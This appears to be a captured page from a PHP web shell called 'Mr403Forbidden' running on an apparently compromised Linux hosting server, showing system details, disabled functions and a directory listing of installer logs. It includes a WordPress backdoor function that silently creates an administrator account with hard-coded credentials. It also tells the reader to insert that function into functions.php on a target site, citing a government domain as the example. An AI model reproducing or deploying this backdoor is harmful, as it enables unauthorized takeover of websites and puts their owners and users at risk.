./Mr403Forbidden

:/var/log/anaconda/ [ drwxr-xr-x ]

System: Linux 94.45.167.72.host.secureserver.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Software: Apache
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 104.21.39.121
Your IP: 216.73.216.150
User: godevadmin (1035) | Group: godevadmin (1013)
Safe Mode: OFF
MYSQL: OFF | PERL: OFF | PYTHON: OFF | WGET: OFF | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
exec,passthru,shell_exec,system

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
anaconda.log file 2024-08-07 14:18 29.49 KB root/root -rw-------
dbus.log file 2024-08-07 14:18 2.89 KB root/root -rw-------
dnf.librepo.log file 2024-08-07 14:18 58.68 KB root/root -rw-------
hawkey.log file 2024-08-07 14:18 120 B root/root -rw-------
journal.log file 2024-08-07 14:18 2.42 MB root/root -rw-------
ks-script-6yruoyuz.log file 2024-08-07 14:18 0 B root/root -rw-------
ks-script-jmg2luyg.log file 2024-08-07 14:18 0 B root/root -rw-------
ks-script-jzdhqny7.log file 2024-08-07 14:18 0 B root/root -rw-------
lvm.log file 2024-08-07 14:18 25.22 KB root/root -rw-------
packaging.log file 2024-08-07 14:18 221.31 KB root/root -rw-------
program.log file 2024-08-07 14:18 5.85 KB root/root -rw-------
storage.log file 2024-08-07 14:18 133.99 KB root/root -rw-------
syslog file 2024-08-07 14:18 497.21 KB root/root -rw-------

© ./Mr403Forbidden